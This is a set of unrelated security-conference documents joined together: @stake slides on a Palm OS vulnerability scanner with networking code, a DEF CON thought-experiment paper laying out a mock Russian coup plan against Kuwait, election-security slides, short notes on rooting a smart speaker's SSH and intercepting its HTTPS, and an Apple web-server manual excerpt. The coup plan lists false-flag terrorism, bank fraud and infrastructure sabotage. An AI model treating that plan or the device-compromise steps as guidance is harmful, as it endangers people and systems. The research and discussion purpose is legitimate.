P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Palm OS NetLib
Provides network services to Palm OS applications
– Stream-based communications using TCP
– Datagram-based communications using UDP
– Raw IP available too
In addition to native Palm OS function calls, NetLib also
supports the Berkeley Socket API
Lesson Learned:
Using the native NetLib
calls gives you much better
control over network
communications, such as
the ability to set timeouts.
Lesson Learned:
Close sockets as
soon as you no
longer need them,
you only have half a
dozen to play with!
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Native Network Library
AUSTIN Net Lib implemented in C as a PocketC native
library
Implements the following calls
– netLibInit(…)
– netLibVersion(…)
– netSetTimeout(…)
– netGetError(…)
– netLibClose(…)
– netTCPConnect(…)
– netSocketConnect(…)
– netSocketOpen(…)
– netSocketReceive(…)
– netSocketSend(…)
– netSocketClose(…)
Lesson Learned:
Default timeout is 5 seconds, you may need
to increase this if you’re on a slow
connection, see the Preferences database.
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Example: netSocketSend()
// sends data via socket
// int netSocketSend(int socket, string data, int length,
int flags, pointer error)
// returns number of bytes sent
void netSocketSend(PocketCLibGlobalsPtr gP) {
Value vSocket, vString, vLength, vFlags, vErrorPtr, *errP;
char *buf;
Int16 bytes;
// get parameters
gP->pop(vErrorPtr);
gP->pop(vFlags);
gP->pop(vLength);
gP->pop(vString);
gP->pop(vSocket);
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Example: netSocketSend() (continued)
// dereference the error ptr
errP = gP->deref(vErrorPtr.iVal);
// lock string before modification
buf = (char *) MemHandleLock(vString.sVal);
// send data, capture number of bytes sent
bytes = NetLibSend(AppNetRefnum, vSocket.iVal, buf, vLength.iVal,
vFlags.iVal, 0, 0, gP->timeout, &(gP->error));
// cleanup
MemHandleUnlock(vString.sVal);
gP->cleanup(vString);
// return number of bytes sent, set error ptr
gP->retVal->iVal = bytes;
errP->iVal = gP->error;
}
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
HTTP HEAD with AUSTIN Net Lib & Net.h
//http_head.pc
library "AUSTIN_NetLib"
#include "Net.h"
main() {
int err, port, socket, bytes;
string result, host, toSend = "HEAD / HTTP/1.0\r\n\r\n";
err = initNet();
host = getsd("Connect to?", "192.168.199.129");
port = getsd("Port?", "80");
socket = tcpConnect(host, 80);
if (socket >= 0) {
bytes = tcpWrite(socket, toSend);
bytes = tcpRead(socket, &result, 200);
puts("Received " + result);
tcpClose(socket);
}
clearNet();
}
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
More Lessons Learned about Native Libraries
Read all the PocketC documentation on native libs
(i.e. that one file in the docs/ folder :-)
Make sure you have your dev environment set up
correctly, i.e. all the include files and all the lib files
Go to the PocketC forums and read the discussions
that have mentioned native libs (some have code
samples)
Use AUSTIN Net Lib as a basis for your own libs (and
re-use the makefile too!)
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Database Access
Pocket Toolbox manipulates two DB formats
– Pilot-DB (GPL)
– HanDBase (Commercial)
Databases are used throughout AUSTIN
– Preferences
– Web vulnerabilities
– Results
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Graphical User Interfaces
Two ways to create GUIs on Palm OS
–
Dynamically (i.e. programmatically)
–
Resource files (i.e. using PilRC to create a resource file)
Part of AUSTIN’s resource file
FORM ID 4000 AT (0 0 160 160)
NOFRAME
MENUID 8000
BEGIN
TITLE "AUSTIN"
BUTTON "Scan!" ID 4201 AT (121 2 AUTO 9) FONT 1
LABEL "Options:" AUTOID AT (0 78) FONT 0
CHECKBOX "TCP Scan" ID 4301 AT (48 62 AUTO AUTO) FONT 0
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Scheduled Scanning
AUSTIN can scan at regular intervals
Users can specify
– Number of scans
– Minutes between scans
– Whether to scan or sleep first
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Tying it all Together
palmos.com
RCP
Icons
Creator ID
Source
PilRC
PDE
PAR
AUSTIN
Note: AUSTIN Net Lib could also be embedded
inside AUSTIN but is kept separate to facilitate reuse
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
But wait! There’s more!!!
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
@stake SonyEricsson P800 Development
What is the P800?
@stake NetScan
@stake MobilePenTester
@stake PDAZap
Where can we get them?
Advert for CCC / Thanks
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
What is the P800?
Cell-phone
–
GSM
–
GPRS
–
HSCD
–
Tri-band
PDA
–
Symbian OS Based
–
12mb Internal Flash
–
Memory Stick Duo ™ Support
Other
–
Bluetooth Support
–
Camera
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
@stake NetScan
What is it?
–
TCP/UDP port scanner
Why did you develop it?
–
Cutting our teeth on Symbian
development
Features?
–
TCP/UDP
–
Ports 1 to 65535
–
Timeout configuration
–
Basic error checking
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
@stake MobilePenTester
What is it?
–
The first generation
of cellular Swiss army
knives
Why did you develop it?
–
To allow us to enhance our cellular
network assessments and also
empower our operator clients
to DIT (Do It Themselves)
Features?
–
NetScan
–
PDACat
–
WAPScan port
–
HTTP vulnerability scanner
Ollie’s Hand
(oh and the main
menu)
PDACat
in action
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
@stake PDAZap
What is it?
–
The first generation
forensics tool for P800
Why did you develop it?
–
Help us research the device,
help people involved in IR
(incident response)
Features?
–
Mirror devices flash
to Memory Stick Duo ™
–
Mini file browser
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Where can we get them?
@stake dot com
–
NetScan / MobilePenTester:
http://www.atstake.com/research/tools/vulnerability_scanning/
–
PDAZap
http://www.atstake.com/research/tools/forensic/
Who developed them?
–
Ollie Whitehouse (ollie at atstake.com)
Anything else cool?
–
RedFang (The Bluetooth Hunter)
http://www.atstake.com/research/tools/info_gathering/
P800
Ollie
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Advert for CCC / Thanks
So?
–
Ollie is speaking at CCC between 7th and 10th
of August 2003
On what?
–
Cellular Network Security: The New Frontier
GSM/GPRS/UMTS Introduction
GSM/GPRS/UMTS Security
Pragmatic GSM/GPRS/UMTS Assessments
Other areas of assessment/research
Other info?
–
Chaos Communication Camp 2003,
The International Hacker Open Air Gathering
7/8/9/10th August 2003
near Berlin, Germany (Old Europe),
http://www.ccc.de/camp/
Ollie’s current cutting
edge development
platform!
Thanks for listening, sorry I can’t be here!
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
The Future
Trivia Question:
Who makes this
Palm OS watch?
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
NASL Scanning
Idea
– How to leverage the work that the Nessus team has done?
Issues
– (Nearly) All tests written in NASL
– Nessus/NASL not made to run on a Palm
– Complexity is higher
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Comparing NASL and PocketC
Similarities
–
Basic C syntax
for and while loops
Control flow
Blocks
–
No memory management
–
Ints, chars, strings, and arrays
should cover most (all?) NASL
var types
Differences in NASL
–
Comments (# vs. //)
–
No need to declare variables
–
Named function parameters
–
Varargs
–
The “x” operator
–
The “><“ operator
–
Specific functions
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
More Ideas for Features
Creation of custom IP packets
– Enable SYN, FIN, XMAS scans
– Useful for NASL functions too
Network tools (e.g. IP<->Hostname lookups, ping,
traceroute, etc.)
SSL scanning (probably wait for Palm OS 5 device)
VulnXML support for URL scanning
Download updates to URL vuln database
Other suggestions?
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Let’s Review Those Goals
Overview of Palm OS as a hacking platform
Walkthrough of a Palm OS-based vulnerability scanner
–
Architecture
–
Features & how they’re implemented
–
Lessons learned
Release a new tool for Palm OS
Have Fun!
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Thanks
for listening!
Any questions?
You can download AUSTIN here:
http://atstake.com/research/tools/vulnerability_scanning/ | pdf |
A COUP D'ETAT BY A GROUP OF MERCENARY HACKERS
Paper by: C Rock and S Mann:
Winston Churchill famously said - when the Germans were about to
overrun France on one or other of their invasions - "Gentlemen, do
not forget, this is not just about France ... this is about
champagne."
A 'Coup' in France can mean a glass of champagne. A blow. But that
is not our subject. We mean Coup d'Etat, putsch, Assisted Regime
Change.
The Urban Dictionary: "Coup d'Etat
Seizure of power by an armed entity, usually the army but
sometimes the police.
Usually coups are perpetrated in countries with very weak
governments, such as in West Africa, Bolivia, or Southwest Asia.
They get progressively worse (i.e., more violent, more prolonged,
and more repressive) until eventually some junta builds up
protection against the next coup. This is what happened in Iraq
after 1979; it happened in Syria in 1973; it also happened in
Japan in 1607. In other cases, the coup accomplishes its goals
(Chile 1973) and retires as a PR move.
Military coups are difficult to pull off and usually are nipped in
the bud. Even with foreign assistance, they are hard, because they
are a form of high-speed civil war.
by Primus Intra Pares July 11, 2010"
So how does this paper define its subject matter, the Coup d'Etat?
A blow - a knock out blow - against the existing government of a
sovereign state. A blow that puts in place a new government. That
blow is the work of a group within the existing state government.
They are armed & powerful. This bunch, however, are modern. They
are going to use hackers.
Putsch? Another word for the same thing. Assisted Regime Change?
Perhaps the same thing, but probably very different. Assisted
Regime Change can be a euphemism for a Coup or Putsch, or it can
be far more insidious.
When a democracy votes it may result in a regime change. It's
meant to. What if a super power carries out actions to influence
an election that does bring down a regime? What if those actions
were not overt? What if those actions were covert or clandestine?
What if the good of the people is best served if there is the need
for a regime change? What if those actions - albeit covert - were
really in the interests of the people? Who says that's so?
One man's Coup leader - a hero - is another's Superpower puppet.
Traitor.
New definition of COUP after working with the Cyber angle
What if the Coup of this century does NOT follow our definition
exactly … that was:
A Coup d'Etat: a secretly prepared but overtly carried out illegal
blow to unseat & replace the ruling executive government of a
sovereign state, somehow executed by the military or other elite
of that state's apparatus or their agents.
What if (because change is the one constant etc) we say:
A Coup d'Etat: a secretly prepared but overtly carried out illegal
blow to somehow takeover the ruling executive government of a
sovereign state, somehow executed by the military or other elite
of that state's apparatus or their agents.
It doesn’t have to be replaced. It has to be suborned. I guess
that the best example of a suborned government is that of Petain,
and Vichy France.
Working Scenario Back Story and Mudmap
1. Historically (19TH C onwards … the Great Game …) Russia has
always wished to extend its power down into the sub-continent and
- therefore - the Gulf.
2. That was the cause of their long alliance with Iran … All the
more so today … Putin / Turkey / Syria.
3. Russia are now allies of Iran in the Syria Civil War … despite
Iran now being an ally of the USA despite the long standing claims
of Iraq that Kuwait has drilled into it’s reserves using
horizontal drilling.
4. Russia would love Basra. the port of Basra that the British
always knew was the key card to the Gulf, but Russia can’t have
Basra, so they hatch a plan - along with their friends in Tehran -
to take Kuwait, the next best thing to Basra.
5. BUT: Not to take Kuwait in the old fashioned sense … NO
invasion … NO traditional Coup … instead they decide to take
Kuwait by means of a creeping Coup that replaces the machinery of
state - what an FSB / KGB Officer would call the apparat - with a
cardre of infiltrated apparatchiks … a group who surround the
throne so closely that in effect they tell the throne Do this …
Don’t do that …
6. How to achieve this? The Russians know two things above all
else: the people of Kuwait are still grateful to the US and allies
for winning their country back from Saddam, and the deep and
ancient friendship between the Royals of Saudi Arabia and Kuwait …
through their common tribe as well as everything else.
7. They also know that their is a friendship between the tribe of
Kuwait and people of SW Iran. This is documented and crosses or
transcends the Sunni / Shia rivalry.
8. Meanwhile … What do the Saudi’s want more than anything else?
To know the intent of the enemy commander. In this case that of
the Ayatollah of Iran and those around him. This is the great
Middle East war of our time: the Sunni Gulf versus the ancient
might of Persia …
9. So the Russians set up a fake agent … close to the Ayatollah’s
etc … so that this agent becomes an asset of the Kuwait
intelligence service … and the Saudi intelligence service love the
Kuwaiti’s for this … it is all their dreams come true …
10. While all this is going on IS have built up a serious chain of
terrorist cells within Kuwait. Kuwait is 30% Shia. The IS cells
are against them, even though they are also against the normal
Sunnis as well … and to what extent are IS in fact Saudi backed?
Big Q??
11. Suddenly a number of things happen. IS jump up in Kuwait fully
active … and do so apparently fully backed by the Saudi’s.
12. At the same time the Kuwaiti run agent close to the
Ayatollah’s turns out to be a plant … deliberately set up by
Kuwait to mislead Riyadh … What?
13. At the same time Iraq (with Baghdad controlled by Tehran, of
course) presses it’s claims: horizontal drilling ! We want our oil
back … or $B …
14. Kuwait are now under attack. From Iraq about the oil. From IS
about Allah. From the Saudi’s for fooling them so badly. AND SO …
in this massive fall out Kuwait turn to their new found and ever
willing strong friend: Russia … and Russia moves in …
It is hacking and manipulation of IT data that is making ALL this
happen … How? because so much of all this is in fact now IT based:
information storage, intelligence analysis and management, social
media, The News. You (us) already own the countries entire I.T
systems, now its just a matter of pulling the right levers.
Corruption, is perfect to bring down the government. Wasting the
countries natural resources and all of that.
MOCK PAPER WRITTEN BY THE RUSSIAN STAFF
[in fact written by Chris Rock and Simon Mann
1. Introductory Background
In order to avoid being encircled by foreign powers and possible
enemies Russia has long sought to establish herself as a Major
Power in the Arabian Gulf and the Indian Ocean.
This intent has all the more force when one considers the economic
importance of the Gulf to our rivals, the USA and allies, as well
as the strategic importance of the Indian Ocean.
Iran has long been our ally and friend, most especially since the
Coup of 1941 engineered by ourselves and the British, against the
then interest of Nazi Germany.
The Anglo-Soviet Invasion of Iran also known as Anglo-Soviet
Invasion of Persia was the invasion of the Empire of Iran during
World War II by Soviet, British and other Commonwealth armed
forces. The invasion lasted from 25 August to 17 September 1941,
and was codenamed Operation Countenance. The purpose was to secure
Iranian oil fields and ensure Allied supply lines (see Persian
Corridor) for the Soviets, fighting against Axis forces on the
Eastern Front. Though Iran was officially neutral, according to
the Allies its monarch Rezā Shāh was friendly toward the Axis
powers and was deposed during the subsequent occupation and
replaced with his young son Mohammad Reza Pahlavi.
Our efforts in Afghanistan, mounted from our then controlled
state, Turkmenistan, were all a part of this longstanding Russian
Grand Strategic desire. The British and then the USA have always
fought against this aim of ours, a fight which validates our
intent. They are afraid of a Russia that can exercise her power in
the Arabian Gulf / Sub-continent of India / Indian Ocean theatre.
Following the invasion of Iraq by the US and its allies in 2003 -
and the subsequent events in the region - it has become all the
more imperative that Russia takes the steps needed to defend
herself.
The ideal for Russia would be the control of Basra as a military
and commercial port. Basra - as the British always knew - is vital
to the control of the Arabian Gulf. That is why the British always
tried to hold on to Basra. Since Basra is impossible without
risking all out war with the USA the control of Kuwait and of the
Straights of Hormuz will be enough.
The latter is already achieved by our allies Iran.
Therefore, this paper outlines a plan whereby Russia can take
control of Kuwait, thus achieving a major step towards her Grand
Strategy for the Middle East and Indian Ocean theatres of
operations.
2. The Aim
Russia’s Aim is to capture and hold full control of the mechanisms
of power of Kuwait.
3. Plan: General Outline
The plan is that over as many years as it takes Russia will
befriend the rulers of Kuwait. This friendship will become
stronger as other friends of Kuwait fall away. In the end Russia
achieves her aim. Russia will be the only friend, and the only
actual military ally when all else have failed.
Russia will then control Kuwait. The Russian aim will have been
achieved.
Since these rulers of Kuwait are traditional friends and allies of
both the ruling family of Saudi Arabia, that of Abdul Aziz Ibn
Saud and of the USA and allies - especially the UK of which Kuwait
was a Protectorate until 1961 - this will be hard. All Kuwait
still hold dear the memory of the USA and allies rescuing their
country from the invasion by Iraq of August 1990.
However, we should also keep in mind that before the Iraq invasion
Kuwait was the most pro USSR country in the Gulf region, and was
the portal for all Gulf states to stay in good contact with
Russia. There is a historic background to our plan.
Therefore Russia must be clever. We befriend Kuwait gently. Over
time Russia takes her time. We support Kuwait whenever we can.
At the same time we set into action maskirovka operations that
will alienate Kuwait from her friends. These operations terminate
with a crisis, at which point Russia steps in to rescue her
friend, and new and close ally. D DAY.
All of these operations must be clandestine in the true sense.
They
are
covert.
They
will
always
be
denied.
‘Plausible
deniability’ is essential in every action at every stage. As much
as possible these operations will be carried out using IT hacking
and deception. By that means deniability is more easily achieved.
While as much activity as possible is cyber there will be a
cocktail of hacking, cyber, misinformation and hard acts of
violence. Such a cocktail will give the most effective result.
Highlight of this color denotes those points in the attack to be
carried out by hacker / cyber war ops.
4. DAESH
An IS splinter group will be brought in to being by us. Twenty to
one hundred men will be a good strength. They will be part Kuwaiti
and part Iraqi. On behalf of the Caliphate they claim money from
Kuwait for oil stolen by Kuwait’s slant drilling across the Iraq
border at the Rumaila field.
This group also represents the dissenting interest of the
stateless Bidoon people (150,000 or so … 10% of the Kuwaiti
population).
Russia will clandestinely set up, train, equip and sustain this
splinter group. It will in fact exist, albeit very small.
The group will wage cyber war against Kuwait, although this will
always be kept in check. We do not want to show our hand too
early.
Some terrorist actions of this group will be real. They will be up
to IS’s high standards of nastiness. The operations of this group
build slowly, leading in to the crisis ... thence to D DAY.
This splinter group will be penetrated by Kuwait intelligence.
This penetration will be achieved by a number of means: spies and
technical
intercept.
However, this penetration will be fake, a maskirovka, set up by
us, Russia, and by the splinter group itself.
The fake intelligence that will come out of the IS splinter group
will slowly build a false picture that the group is strongly
backed by Saudi Arabia. That Saudi Arabia are in fact attacking
Kuwait.
5. MISRULE: Misfortune, incompetence, corruption and mis-rule
Misfortune, incompetence, corruption and mis-rule. In the process
Kuwait are robbed and defrauded of Billions of US $ worth of money
and oil. This is achieved by offshore and implicating $$ transfers
from private and commercial banks.
These actions will be undertaken by our own cyber / hacking teams,
but they will be made to look like the work of the Saudi backed IS
splinter group described above.
The actions of this sub-operation will build slowly, leading into
the crisis and then D DAY.
6. POISONED INTELLIGENCE
We, Russia, will feed into the Kuwait Intelligence Service an
intelligence circuit that penetrates Iran’s Intelligence service
and military. This will be high level and of great value. Kuwait
will feed it to the Saudi’s.
At the right time - as the crisis and D DAY come closer - the
Saudi’s discover that this intelligence circuit is a dangerous
fake, and that the Kuwaiti’s must have known that.
7. THIEVES: oil & oil revenue stolen from Saudi Arabia and Iraq
The theft of oil and oil revenue from Saudi Arabia and Iraq by any
possible means will be carried out in such a way that it must be
Kuwait doing the stealing.
This will primarily be a hacking operation. The blame will be laid
to the door of Kuwait.
8. FALSE CYBER: acts of cyber warfare against Saudi Arabia and
Iraq
These will be carried out by our Russian teams but they will be
clumsy, and leave the traces of their being the work of Kuwait.
8. SPIRAL
This downward spiral - leading into civil war and mutiny - that
coordinates with but is not a part of the IS splinter group
activities.
- setting up of NGO’s in Kuwait and overseas that demand human and
civil rights etc etc for Kuwait
- there is as a result civil disorder. This disorder builds. At all
times paid agitators raise the temperature of such actions
- false flag operations on social media and the internet as a whole
intensify
emotions
and
manipulate
the
situation
- Kuwait Security Forces (KSF) over react. This is ensured by
having paid agitators amongst the KSF
- over reaction sparks further action, and that brings about
terrible
over
reaction
once
more
…
the
downward
spiral
accelerates … civil insurrection is now rampant
- as background to this civil insurrection there are border and
terrorist incidents. There is insurgency and terrorism. There are
acts
of
sabotage,
actual
and
virtual
- at some point there is a mutiny of KSF
- mutiny is suppressed by other parts of KSF and thus civil war has
begun. Of course, within both parts of the KSF in this fight
there are paid agitators. They are there to ensure we achieve
what we want
- the losing part of KSF in this civil war will be that part which
the world has been led to believe are the ‘good’ part
- their requests for assistance, will lead to the welcome
assistance of Russian, when it comes
The above subordinate operations [DAESH - MISRULE - POISONED
INTELLIGENCE - THIEVES - FALSE CYBER] all contribute to SPIRAL.
They build slowly, then combine to create the D DAY brought about
at the end of SPIRAL.
9. D DAY
SPIRAL leads to and ends with D DAY. The other subordinate
operations have also slowly built to this point.
Just at the moment that the civil war between the two different
parts of KSF - the mutineers and the mutiny suppressors - has
become serious, and the world sees what is at stake, then the
crisis is there. It is D DAY.
- shut down all communications, internal and external, civil and
government.
- shut all phone exchanges, cell phone masts and switches,
international voice and data gateways
- shut all internet and ‘bomb out’ all computers
- shut down all radio, TV and press
- close airport, ATC and airspace
- close port and sea movements
- close banks (domestic & international), ATM’s, credit
transaction, on line banking etc
- shut power generation so that there is no electricity or natural
gas supply
- sabotage high tension power lines and drain transformers of
cooling oil
- close down all petrol stations
- close public water supply
- close traffic management computers
10. DESIGNATE
This sub-operation is concerned with the selection and preparation
of a new Head of State and his supporting Ministers and staff.
Factors that must be taken into account here include the
following. That there is a tribal connection to Iran that crossed
the Sunni divide Shia. It should be possible to find such a person
who is or becomes a full Russian agent.
11. POST
This sub-operation is concerned with the ways in which our power
over Kuwait is to be exercised once the above operations have
taken place and Russia is in charge. | pdf |
Sean Kanuck
DEF CON 25
Hacking Democracy :
A Socratic Dialogue
How do you know
if your vote was
recorded correctly
Which is more
important to you :
secrecy or verification
How much error
is too much for
legitimacy
Were you on the
right list
Were you in the
right place
Does the process
impact you
more than others
Who decides what
becomes news
Which runner is
in the lead
Is the playing field
made of natural
or artificial turf
How much
free speech
is too much
Can foreign guests
join the party
Is this an
invitation to a
masquerade ball
Which innocent
victims deserve
protection
Are they required
to accept help . . .
from their opponent
Is any of this
actually
new at all
Can two rights
make a wrong | pdf |
KinectASploit
What if you took a
kinect,
used it's skeleton
tracking features
KinectASploit
Sprinkled in some
hacking tools:
Wait a minute!... we did
that already.
Lets find out!
Come see the Demo at
Defcon20 and look for the tool
source at:
http://p0wnlabs.com/defcon20
jeff bryner
p0wnlabs.com
Use @ your own risk | pdf |
0x01bettercap
0x02ssh
rm /etc/dropbear/*
dropbearkey -t rsa -f /etc/dropbear/dropbear_rsa_host_key
dropbear -r /etc/dropbear/dropbear_rsa_host_key
0x03root
1. /usr/share/mico/messaging/messaging.conf
0x04https
2. /usr/share/mico/messaging/mediaplayer.cfg CA
3. pub
openssl rsa -inform DER -in priburp -pubout -out burp.pub
4.
5. sopub
6.
0x05 | pdf |
Mac OS X Server
Web Technologies
Administration
For Version 10.3 or Later
034-2350_Cvr 9/12/03 7:31 AM Page 1
Apple Computer, Inc.
© 2003 Apple Computer, Inc. All rights reserved.
The owner or authorized user of a valid copy of
Mac OS X Server software may reproduce this
publication for the purpose of learning to use such
software. No part of this publication may be reproduced
or transmitted for commercial purposes, such as selling
copies of this publication or for providing paid for
support services.
Every effort has been made to ensure that the
information in this manual is accurate. Apple Computer,
Inc., is not responsible for printing or clerical errors.
Use of the “keyboard” Apple logo (Option-Shift-K) for
commercial purposes without the prior written consent
of Apple may constitute trademark infringement and
unfair competition in violation of federal and state laws.
Apple, the Apple logo, Mac, Mac OS, Macintosh, and
Sherlock are trademarks of Apple Computer, Inc.,
registered in the U.S. and other countries.
Adobe and PostScript are trademarks of Adobe Systems
Incorporated.
Java and all Java-based trademarks and logos are
trademarks or registered trademarks of Sun
Microsystems, Inc. in the U.S. and other countries.
Netscape Navigator is a trademark of Netscape
Communications Corporation.
UNIX is a registered trademark in the United States and
other countries, licensed exclusively through
X/Open Company, Ltd.
034-2350/09-20-03
LL2350.book Page 2 Friday, August 22, 2003 2:32 PM
3
1
Contents
Chapter 1
7
Web Technologies Overview
8
Key Web Components
8
Apache Web Server
8
WebDAV
8
CGI Support
8
SSL Support
8
Dynamic Content With Server-Side Includes (SSI)
9
Front-End Cache
9
Before You Begin
9
Configuring Your Web Server
9
Providing Secure Transactions
9
Setting Up Websites
10
Hosting More Than One Website
10
Understanding WebDAV
11
Understanding Multipurpose Internet Mail Extension
Chapter 2
13
Managing Web Technologies
13
Setting Up Your Web Server for the First Time
15
Using Server Admin to Manage Your Web Server
15
Starting or Stopping Web Service
16
Modifying MIME Mappings and Content Handlers
17
Managing Connections
17
Setting Simultaneous Connections for the Web Server
18
Setting Persistent Connections for the Web Server
18
Setting a Connection Timeout Interval
19
Setting Up Proxy Caching
20
Blocking Websites From Your Web Server Cache
20
Using Secure Sockets Layer (SSL)
20
About SSL
21
Using WebDAV
21
Using Tomcat
22
Viewing Web Service Status
22
Web Service Overview
LL2350.book Page 3 Friday, August 22, 2003 2:32 PM
4
Contents
22
Web Service Modules in Use
22
Viewing Logs of Web Service Activity
Chapter 3
23
Managing Websites
23
Using Server Admin to Manage Websites
23
Setting Up the Documents Folder for a Website
24
Enabling a Website on a Server
25
Changing the Default Web Folder for a Site
25
Setting the Default Page for a Website
26
Changing the Access Port for a Website
26
Improving Performance of Static Websites (Performance Cache)
26
Understanding the Effect of Using a Web Service Performance Cache
27
Enabling Access and Error Logs for a Website
28
Setting Up Directory Listing for a Website
29
Creating Indexes for Searching Website Content
29
Connecting to Your Website
30
Enabling WebDAV on Websites
31
Setting Access for WebDAV-Enabled Sites
32
WebDAV and Web Content File and Folder Permissions
32
Enabling Integrated WebDAV Digest Authentication
32
WebDAV and Web Performance Cache Conflict
33
Enabling a Common Gateway Interface (CGI) Script
33
Enabling Server Side Includes (SSI)
34
Viewing Website Settings
34
Setting Server Responses to MIME Types and Content Handlers
35
Enabling SSL
36
Setting Up the SSL Log for a Website
36
Enabling PHP
36
User Content on Websites
37
Web Service Configuration
37
Default Content
37
Accessing Web Content
Chapter 4
41
WebMail
41
WebMail Basics
41
WebMail Users
42
WebMail and Your Mail Server
42
WebMail Protocols
42
Enabling WebMail
43
Configuring WebMail
Chapter 5
45
Secure Sockets Layer (SSL)
45
Setting Up SSL
LL2350.book Page 4 Friday, August 22, 2003 2:32 PM
Contents
5
45
Generating a Certificate Signing Request (CSR) for Your Server
46
Obtaining a Website Certificate
47
Installing the Certificate on Your Server
47
Enabling SSL for the Site
48
Web Server SSL Password Not Accepted When Manually Entered
Chapter 6
49
Working With Open-Source Applications
49
Apache
50
Location of Essential Apache Files
50
Editing Apache Configuration Files
51
Starting and Stopping Web Service Using the apachectl Script
51
Enabling Apache Rendezvous Registration
55
Experimenting With Apache 2
56
JBoss
58
Backing Up and Restoring JBoss Configurations
58
Tomcat
59
MySQL
60
Installing MySQL
Chapter 7
61
Installing and Viewing Web Modules
61
Apache Modules
61
Macintosh-Specific Modules
61
mod_macbinary_apple
62
mod_sherlock_apple
62
mod_auth_apple
62
mod_hfs_apple
62
mod_digest_apple
62
mod_rendezvous_apple
62
Open-Source Modules
62
Tomcat
63
PHP: Hypertext Preprocessor
63
mod_perl
Chapter 8
65
Solving Problems
65
Users Can’t Connect to a Website on Your Server
66
A Web Module Is Not Working as Expected
66
A CGI Will Not Run
Chapter 9
67
Where to Find More Information
Glossary
69
Index
73
LL2350.book Page 5 Friday, August 22, 2003 2:32 PM
LL2350.book Page 6 Friday, August 22, 2003 2:32 PM
1
7
1
Web Technologies Overview
Become familiar with web technologies and understand
the major components before setting up your services
and sites.
Web technologies in Mac OS X Server offer an integrated Internet server solution. Web
technologies—also called web service in this guide—are easy to set up and manage,
so you don’t need to be an experienced web administrator to set up multiple websites
and configure and monitor your web server.
Web technologies in Mac OS X Server are based on Apache, an open-source HTTP web
server. A web server responds to requests for HTML webpages stored on your site.
Open-source software allows anyone to view and modify the source code to make
changes and improvements. This has led to Apache’s widespread use, making it the
most popular web server on the Internet today.
Web administrators can use Server Admin to administer web technologies without
knowing anything about advanced settings or configuration files. Web administrators
proficient with Apache can choose to administer web technologies using Apache’s
advanced features.
In addition, web technologies in Mac OS X Server include a high-performance, front-
end cache that improves performance for websites that use static HTML pages. With
this cache, static data doesn’t need to be accessed by the server each time it is
requested.
Web service also includes support for Web-based Distributed Authoring and Versioning,
known as WebDAV. With WebDAV capability, your client users can check out webpages,
make changes, and then check the pages back in while the site is running. In addition,
the WebDAV command set is rich enough that client computers with Mac OS X
installed can use a WebDAV-enabled web server as if it were a file server.
Since web service in Mac OS X Server is based on Apache, you can add advanced
features with plug-in modules. Apache modules allow you to add support for Simple
Object Access Protocol (SOAP), Java, and CGI languages such as Python.
LL2350.book Page 7 Friday, August 22, 2003 2:32 PM
8
Chapter 1
Web Technologies Overview
Key Web Components
Web technologies in Mac OS X Server consist of several key components, which
provide a flexible and scalable server environment.
Apache Web Server
Apache is an open-source HTTP web server that administrators can configure with the
Server Admin application.
Apache has a modular design, and the set of modules enabled by default is adequate
for most uses. Server Admin can control a few optional modules. Experienced Apache
users can add or remove modules and modify the server code. For information about
modules, see “Apache Modules” on page 61.
Apache version 1.3 is installed in Mac OS X Server. Apache version 2 is provided with
the server software for evaluation purposes; it is located in /opt/apache2/.
WebDAV
Web-based Distributed Authoring and Versioning (WebDAV) is particularly useful for
updating content on a website. Users who have WebDAV access to the server can open
files, make changes or additions, and save those revisions.
You can also use the realms capability of WebDAV to control access to all or part of a
website’s content.
CGI Support
The Common Gateway Interface (CGI) provides a means of interaction between the
server and clients. For example, CGI scripts allow users to place an order for a product
offered on a website or submit responses to information requests.
You can write CGI scripts in any of several scripting languages, including Perl and
Python. The folder /Library/WebServer/CGI-Executables is the default location for CGI
scripts.
SSL Support
Web service includes support for Secure Sockets Layer (SSL), a protocol that encrypts
information being transferred between the client and server. SSL works in conjunction
with a digital certificate that provides a certified identity for the server by establishing a
secure, encrypted exchange of information.
Dynamic Content With Server-Side Includes (SSI)
Server-side includes provide a method for using the same content on multiple pages in
a site. They also can tell the server to run a script or insert specific data into a page. This
